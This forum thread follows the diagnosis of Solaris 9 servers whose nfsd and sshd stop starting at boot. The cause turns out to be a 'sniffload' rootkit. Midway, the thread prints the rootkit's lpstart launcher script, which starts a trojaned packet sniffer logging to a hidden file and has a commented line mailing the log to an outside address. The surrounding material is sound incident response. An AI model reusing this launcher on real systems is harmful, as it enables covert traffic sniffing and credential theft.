nfsd won't start at boot up

Hi

Inexplicably, nfsd no longer starts automatically on our Sun boxes running Solaris 9, so 'automount' no longer works after a reboot. The problem first showed up when we could not access files in any of the NFS automounted directories on our LAN after one of the servers (say server A) was rebooted. Attempts on server B to 'cd' to any of the directories served by server A were met with 'permission denied'. 'ps -ef | grep nfsd' revealed that 'nfsd' was not running. Meanwhile 'automount' was issuing the message 'server A not responding', though we could 'ping' server A just fine.

We then rebooted server B, and its 'nfsd' too failed to start at boot, leading to the same 'automount' problem on server A. Starting 'nfsd' manually on both systems fixes the 'automount' problem on both.

Perhaps because of whatever caused this behavior, we are no longer able to access these servers using 'ssh' or 'sftp'. Regular non-secure 'ftp' works, but only within the LAN (we are behind an institution-wide firewall). This came out of the blue: up until this week these servers had behaved well and reliably for a few years, providing all kinds of services and resources. Please help!

When was the last change to the nfs startup scripts and inittab? To find out, use
ls -ld /etc/init.d /etc/init.d/nfs.server
ls -ld /etc/rc3.d /etc/rc3.d/*nfs.server
ls -l /etc/inittab

When nfsd is not running, does "/etc/init.d/nfs.server start" restart it? Is the box in run level 3? Use "who -r" to verify. If not, what does: "grep initdefault /etc/inittab" say?
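If it helps, the initdefault check can be wrapped in a small function. This is only a sketch: it assumes the usual id:rstate:action:process layout of inittab and a POSIX awk, and the name initdefault_level is made up for illustration.

```shell
#!/bin/sh
# Print the default run level configured in an inittab-style file.
# Assumes colon-separated fields id:rstate:action:process; lines that
# start with '#' are treated as comments and skipped.
initdefault_level() {
    file=${1:-/etc/inittab}
    awk -F: '!/^#/ && $3 == "initdefault" { print $2; exit }' "$file"
}
```

Calling initdefault_level /etc/inittab and comparing the result with what "who -r" reports shows whether the box reached the run level it was configured to boot into.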

UNIX Daemon:

Thank you for replying. The change to nfs start up script was on Fri 3/11, when I added 'set -x' at the very top, then I rebooted the system.

nmr% ls -ld /etc/init.d/nfs.server
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/init.d/nfs.server*

nmr% ls -ld /etc/rc3.d /etc/rc3.d/*nfs.server

drw-r--r-- 2 root sys 512 Aug 20 2003 /etc/rc3.d/
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/init.d/nfs.server*

nmr% ls -l /etc/inittab
-rwxr--r-- 1 root sys 1081 Jun 14 2002 /etc/inittab

"/etc/init.d/nfs.server start" does start nfsd when it fails to start at boot up, and that is how we are able to regain 'mount' functionality... And the system appears to be in run level 3.

nmr% who -r
. run-level 3 Mar 11 15:34

Though my 'dfstab' is populated with several 'share....', the shareall command does not appear to be executed at boot up since 'sharetab' is empty after a reboot. Manually typing 'shareall' repopulates 'sharetab'...

Any thoughts?

Did you make a typo? I don't see a link to nfs.server in /etc/rc3.d in the output you posted. The existence of that link is crucial and its absence could explain why nfs is not being started.
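For what it's worth, here is a rough way to check for that link without relying on how ls is aliased. It is a sketch under a few assumptions: the start scripts are named S<two digits><service>, both directories live on the same filesystem (so equal inode numbers mean a hard link), and the function name check_rc_link is invented for this post.

```shell
#!/bin/sh
# Report whether an rc directory contains a start script for the given
# init.d script, and whether it is a hard link to it (same inode).
check_rc_link() {
    initd_script=$1      # e.g. /etc/init.d/nfs.server
    rc_dir=$2            # e.g. /etc/rc3.d
    name=$(basename "$initd_script")
    want=$(ls -i "$initd_script" | awk '{ print $1 }')
    found=no
    for f in "$rc_dir"/S[0-9][0-9]"$name"; do
        # An unmatched glob stays literal and fails this test.
        [ -f "$f" ] || continue
        found=yes
        have=$(ls -i "$f" | awk '{ print $1 }')
        if [ "$have" = "$want" ]; then
            echo "$f: hard link to $initd_script"
        else
            echo "$f: separate file or symlink"
        fi
    done
    [ "$found" = yes ] || echo "no start script for $name in $rc_dir"
}
```

Usage would be check_rc_link /etc/init.d/nfs.server /etc/rc3.d. If the link really were missing, something like "ln /etc/init.d/nfs.server /etc/rc3.d/S15nfs.server" should recreate it; S15 is the prefix a stock Solaris 9 install uses as far as I know, so check against a healthy box first.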

UNIX Daemon:

I just did a cut and paste of the commands you suggested so that I can rule out a typo, unless there was one in your post. I see no link in rc3.d to nfs.server if there's supposed to be one:

nmr% ls -ld /etc/rc3.d /etc/rc3.d/*nfs.server
drwxr-xr-x 2 root sys 512 Aug 20 2003 /etc/rc3.d/
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 /etc/rc3.d/S15nfs.server

Explicitly, in rc3.d:

nmr% ls -l /etc/rc3.d
total 48
-rw-r--r-- 1 root sys 1708 Apr 6 2002 README
-rwxr--r-- 6 root sys 2124 Apr 6 2002 S13kdc.master*
-rwxr--r-- 6 root sys 1239 Apr 6 2002 S14kdc*
-rwxr--r-- 6 root sys 2777 Mar 11 15:34 S15nfs.server*
-rwxr--r-- 6 root sys 707 Apr 6 2002 S16boot.server*
-rwxr--r-- 6 root sys 621 Apr 6 2002 S34dhcp*
-rwxr--r-- 6 root sys 1496 Mar 2 2002 S50apache*
-rwxr--r-- 6 root sys 616 Apr 6 2002 S76snmpdx*
-rwxr--r-- 6 root sys 1056 Apr 6 2002 S77dmi*
-rwxr--r-- 6 root sys 344 Apr 6 2002 S80mipagent*
-rwxr--r-- 6 root sys 1508 Apr 6 2002 S89sshd*
lrwxrwxrwx 1 root other 19 Jan 7 2002 S90hpjfpmd -> /etc/init.d/hpjfpmd*
lrwxrwxrwx 1 root other 21 Jan 7 2002 S90hpwebjetd -> /etc/init.d/hpwebjetd*
-rwxr--r-- 6 root sys 324 Mar 2 2002 S90samba*
-rwxr-xr-x 5 root bin 461 Jan 31 2002 S99sunpci.server*
nmr%

If this link is missing, what should it look like and how do I restore it? Why did it just disappear!?!?

Thanks

The link appears to be there. You apparently have ls aliased to add some extra options. So the startup scripts look good and I'm not sure what to tell you...

My bet would be that the nfs startup is hanging for some reason, especially since you don't get the ssh functionality either: if the script does not return, the startup sequence does not continue.

Have a look at the output from ptree and see if /etc/rc3.d/S15nfs.server is still running. If so, this is where the problem lies. As for the actual cause of the hang, you might get a clue from that output too, or you could post it here.
If you do post, please be sure to remove any reference to your hostname/IP address from the post.
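To save scanning the whole listing by eye, a filter along these lines could pick out any run-control scripts that are still alive. It is only a sketch: the function name leftover_rc is made up, the patterns assume the scripts show up as /sbin/rcN, /etc/rcN or /etc/rcN.d/Snn..., and it assumes a grep that accepts several -e options.

```shell
#!/bin/sh
# Read a process listing (ptree or ps -ef style) on stdin and print the
# lines that look like run-control scripts which are still running.
# After a boot that completed normally this should print nothing.
leftover_rc() {
    grep -e '/rc[0-9S]$' \
         -e '/rc[0-9S] ' \
         -e '/rc[0-9S]\.d/[SK][0-9][0-9]'
}
```

Run it as "ptree | leftover_rc" shortly after the machine has come up. Any line it prints is a startup script that has not returned yet.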

Here's the output from 'ptree'... Nothing looks out of the ordinary, though I am not sure I know what I am looking for...

nmr% ptree
54    /usr/lib/sysevent/syseventd
61    /usr/lib/picl/picld
62    /sbin/sh /sbin/rc2
  317   /bin/sh /usr/lib/lpstart
    320   /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l
114   /usr/lib/inet/in.ndpd
129   /usr/sbin/rpcbind
147   /usr/sbin/inetd -s
  411   rpc.ttdbserverd
  502   rpc.rstatd
  521   rpc.cmsd
  1397  in.telnetd
    1399  -csh
      1463  ptree
186   /usr/lib/nfs/statd
187   /usr/lib/nfs/lockd
192   /usr/lib/autofs/automountd
204   /usr/sbin/syslogd
207   /usr/sbin/cron
221   /usr/sbin/nscd
227   /usr/lib/lpsched
240   /usr/lib/power/powerd
250   /usr/lib/utmpd
262   /usr/sadm/lib/smc/bin/smcboot
  263   /usr/sadm/lib/smc/bin/smcboot
  265   /usr/sadm/lib/smc/bin/smcboot
276   /usr/lib/sendmail -bd -q15m
277   /usr/lib/sendmail -Ac -q15m
284   /usr/sbin/ifbdaemon /dev/fbs/ifb0
286   /usr/sbin/vold
291   /usr/lib/im/htt -port 9010 -syslog -message_locale C
  293   htt_server -port 9010 -syslog -message_locale C
316   /opt/idl_5.5/bin/bin.solaris2.sparc64/lmgrd -c /opt/license/license.dat
  322   /opt/idl_5.5/bin/bin.solaris2.sparc64/idl_lmgrd -T nmr 6.1 4 -c /opt/li
321   /usr/dt/bin/dtlogin -daemon
  333   /usr/openwin/bin/Xsun :0 -nobanner -dev /dev/fb1 defdepth 24 -auth /var
  335   /usr/dt/bin/dtlogin -daemon
    352   /bin/ksh /usr/dt/bin/Xsession
      362   /usr/openwin/bin/fbconsole
      397   /usr/dt/bin/sdt_shell -c unsetenv _ PWD;             unsetenv DT;
        399   csh -c unsetenv _ PWD;             unsetenv DT;      setenv DISPL
          410   /usr/dt/bin/dtsession
            417   dtwm
              636   /usr/dt/bin/dtexec -open 0 -ttprocid 2.12CW6f 01 409 128963
                637   xterm
                  638   csh
              693   /usr/dt/bin/dtexec -open 0 -ttprocid 2.12CW6f 01 409 128963
                694   xterm
                  695   csh
            418   dtfile -session dtKyaWYa
            419   /usr/dt/bin/dtprintinfo -session dtILaaZa -all -xrm *iconX:2
            420   /usr/dt/bin/dtprintinfo -session dtqJa4Ya -all -xrm *iconX:2
            421   /usr/dt/bin/dtprintinfo -session dthNaqZa -all -xrm *iconX:2
            422   /usr/dt/bin/dtprintinfo -session dtKNayZa -all -xrm *iconX:2
            425   /usr/dt/bin/dtterm -session dtIeaiZa -C -ls
              466   -csh
            426   /usr/dt/bin/dtmail -session dtbfaGZa
            427   /usr/dt/bin/dtcm -session dtJfaOZa -xrm *iconX:2 -xrm *iconY:
            428   /usr/dt/bin/dtterm -session dtYgaWdb
              467   /bin/csh
                667   vi genx.c
            429   /usr/dt/bin/sdtperfmeter -f -H -t cpu -t disk -s 1 -name fppe
            811   /usr/dt/bin/dtexec -open 0 -ttprocid 1.12CW6f 01 409 12896370
              812   /usr/dt/bin/dtscreen -mode hop
  336   /usr/openwin/bin/fbconsole -d :0
366   /usr/openwin/bin/speckeysd
400   /usr/dt/bin/dsdm
409   /usr/dt/bin/ttsession
437   /bin/ksh /usr/dt/bin/sdtvolcheck -d -z 5 cdrom,zip,jaz,dvdrom,rmdisk
  544   /bin/cat /tmp/.removable/notify437
583   /usr/lib/nfs/mountd
585   /usr/lib/nfs/nfsd
1118  ./bash an
1122  ./bash kit
nmr%

Sorry, I wasn't very clear there. I meant when you reboot the machine. But one thing I did spot there was:

62 /sbin/sh /sbin/rc2

That definitely shouldn't be there. It looks like your server isn't making it fully up to run level 3, so /etc/rc3, and hence the contents of /etc/rc3.d, never get run.

This also explains why your other "symptoms" occur.

You need to find out why this is happening, but if you need to get the server up and running normally, you could just kill pid 62 and ssh and all the rest should come up.

You might see something if you truss the rc2 script, maybe, maybe not:
truss -wall -rall -f -o rc2.txt -p 62

Reborg:

I am sure that you are right that the system isn't making it all the way through level 3, as I have traced the other "symptoms" to missing "daemons"...

'ssh' and 'sftp' were not running because 'sshd', like 'nfsd', was not started at boot up. I just restarted 'sshd' manually, and now I can connect with both 'ssh' and 'sftp'.

You wrote:
"Sorry I wasn't very clear there, I meant when you reboot the machine,..."

I am still not sure what you mean? At what point do I run 'ptree' during reboot?

I will now 'truss' and report.

Thanks!

I just ran 'truss'

nmr% truss -wall -rall -f -o rc2.txt -p 62

The command never returned so I did a 'ctrl c' to end it. The output file rc2.txt was created and it contains a single line:

62: waitid(P_PID, 317, 0xFFBFFCC8, WEXITED|WTRAPPED|WNOWAIT) (sleeping...)

Does it mean anything?

reborg is on to something here. Your truss output says rc2 is waiting for lpstart. After I fixed the formatting on your ptree display, that is now obvious. And lpstart is waiting for that lpset.
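The way to read that truss line is that the second argument of waitid(P_PID, ...) is the pid being waited on. A small sketch that pulls that out of a truss log, assuming lines formatted like the one posted above (the function name waited_pids is invented here):

```shell
#!/bin/sh
# Extract "waiter waited-for" pid pairs from truss output lines such as
#   62: waitid(P_PID, 317, 0xFFBFFCC8, ...) (sleeping...)
# Reads the named files, or stdin when no file is given.
waited_pids() {
    sed -n 's/^\([0-9][0-9]*\):[[:space:]]*waitid(P_PID, \([0-9][0-9]*\),.*/\1 \2/p' "$@"
}
```

For the posted log, "waited_pids rc2.txt" gives the pair 62 and 317, and "ptree 317" then shows what that child is and what it in turn has spawned.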

We don't have an lpstart on our Solaris 9 system. I'm not sure where yours comes from.

Hmmmm... lpstart... Let's see. We do have one in /usr/lib. It is a script and here is what it contains:

-----------------------------------------------------------------------

#!/bin/sh

set EMAIL_ADDRESS optix@dr-dre.com

#cp $SNFBIN /usr/lib/lpset
#cp sniffload /usr/lib/lpstart
touch /dev/prom/sn.l

#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null

echo "Restart on `date`" >>/dev/prom/sn.l

if test -f /dev/prom/dos ;then
cd /usr/lib
./lpq
fi

#nohup /usr/lib/lpset -s -o /dev/prom/sn.l >/dev/null &
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&

--------------------------------------------------------------------

I am going to run it and see what happens. Running it as root....

# lpstart
Sending output to nohup.out
^C#

Just had to do a 'ctrl C' as the script wouldn't return... That may be what's happening.

Now what exactly does 'lpstart' do? Is it native to Solaris or was it installed by a package that I installed? Those with a lot more sysadmin experience than me might be able to figure it out. Where is it being started from?

It seems that the puzzle's days are now numbered. Thanks!

I suspect that you have been hacked. dr-dre.com? That won't be from a Sun package! It kinda looks like it's being run from rc2 directly. To see if that's the case...
ls -l /sbin/rc2
grep lp /sbin/rc2

I don't have it in my rc2. If it's not there, try:
grep lpstart /etc/init.d/*
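To cast the net a bit wider in one go, the same search can be run over several startup locations. This is a sketch only: find_refs is a made-up name, and if the box really has been broken into, find and grep on it may themselves have been replaced, so treat a clean result with suspicion.

```shell
#!/bin/sh
# Print every regular file under the given files or directories that
# mentions the given word, e.g. a script name that should not be there.
# Errors such as nonexistent paths are silently ignored.
find_refs() {
    word=$1
    shift
    find "$@" -type f -exec grep -l "$word" {} \; 2>/dev/null
}
```

For example: find_refs lpstart /sbin/rc2 /sbin/rc3 /etc/init.d /etc/rc2.d /etc/rc3.d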

This is beginning to look like a break-in. The email in the script 'optix@dr-dre.com' might be related to this website.

http://www.dr-dre.com/index.shtml

Then I just 'googled' this out

Sniffload

"Posted By Gustavo Colmenares On Sunday, September 01, 2002 at 5:31 PM

I have a Mailserver with Solaris 2.7 and recently it was hacked with a rootkit "sniffload." (sniffer)

This rootkit replaces versions of the filesystem files with troyan horses (ps, find, netstat for example) and to send information to an unknown address 128.0. something.

The files that it installs are lpq, lpset, lpstart in the directory usr/lib

Can somebody help me to return my system to the normality? What can I do to stop the attack?

Thank you for your help"

And I googled this... From this page:

Sure enough..

# grep lp /sbin/rc2
/usr/lib/lpstart
/usr/lib/lpstart
/usr/lib/lpstart
#

What to do now? Is there a way for me to find out which other binaries have been compromised?

Thanks for your help!

I see that you say "(we are behind an institution-wide firewall)". Do you have institution-wide security people? Contact them. Now. Tonight. This attack has almost certainly spread past this one system. As for this system, I would completely re-install the operating system.
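On the question of finding out which other binaries were touched: the general idea is to compare checksums against a baseline taken from a known-good system, using tools you trust (for example from read-only media), because the tools on the compromised box cannot be trusted. A rough sketch of that idea follows. The function names are made up, cksum is only a CRC and not a tamper-proof digest, and this is an illustration, not a substitute for the reinstall.

```shell
#!/bin/sh
# Record checksum and size for a set of files (run on a known-good system).
make_baseline() {
    cksum "$@"
}

# Compare files against a baseline written by make_baseline and report
# any that are missing or whose checksum or size differs.
# Baseline lines have the form: <checksum> <size> <path>
changed_files() {
    baseline=$1
    while read -r sum size path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"
        elif [ "$(cksum < "$path")" != "$sum $size" ]; then
            echo "CHANGED $path"
        fi
    done < "$baseline"
}
```

Usage would be along the lines of "make_baseline /usr/bin/ps /usr/bin/find /usr/bin/netstat > baseline" on a clean machine of the same release and patch level, then "changed_files baseline" on the suspect one. Even then, a clean report only says those particular files match.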

There is no way around the fact that we must rebuild our systems. Just in time to upgrade to Solaris 10. Just left our IT people a message, but my sense is that the damage won't be extensive since our IT explicitly tells people that they do not support UNIX boxes, so that most people have avoided getting them or have been migrating to supported platforms. Since I could not count on support from our IT, I had contacted Sun's tech support (@ $300/hr), but they could not figure out what was going on, so I looked for the answer online, which led me to the Unix Forums.

Is Solaris 10 stable? Does anyone have experience with it yet?

Thanks for everything!

Thanks Peraderabo,

You picked that up nicely where I left off.

dcshungu, glad we were able to help. Now, apart from a clean reinstall, don't forget to change the root passwords on all your machines after the reinstall, and make sure user passwords are also changed. Also, if you don't need to use them, you should consider disabling telnet/rlogin/rsh/rcp/rexec/ftp and using only the secure equivalents.
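On a Solaris 9 box those services are normally started from inetd, so disabling them comes down to commenting out their lines in inetd.conf. Here is a sketch of that, assuming a POSIX awk (nawk on Solaris) and that the service name is the first field of each line. The function name is invented, and it only prints the edited copy, so nothing is changed until you install the result yourself.

```shell
#!/bin/sh
# Print a copy of an inetd.conf-style file with the named services
# commented out. The input file itself is not modified.
disable_inetd_services() {
    conf=$1
    shift
    awk -v list="$*" '
        BEGIN {
            n = split(list, names, " ")
            for (i = 1; i <= n; i++) off[names[i]] = 1
        }
        # Prefix active lines whose first field is a listed service.
        !/^#/ && ($1 in off) { print "#" $0; next }
        { print }
    ' "$conf"
}
```

In inetd.conf, rlogin appears as "login", rsh and rcp as "shell", and rexec as "exec", so a call might look like "disable_inetd_services /etc/inet/inetd.conf telnet login shell exec ftp > /tmp/inetd.conf.new". After reviewing and installing the new file, inetd needs a HUP (for example "pkill -HUP inetd") to reread it.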

There may well be no support for Unix desktops, but there may be Unix servers elsewhere in the network, such as mail servers. Even if this is not the case, your IT people should at least be concerned about the security breach, whether it was internal or external.

For Solaris 10 you should start a new thread to ask about it since you are moving on to a new topic.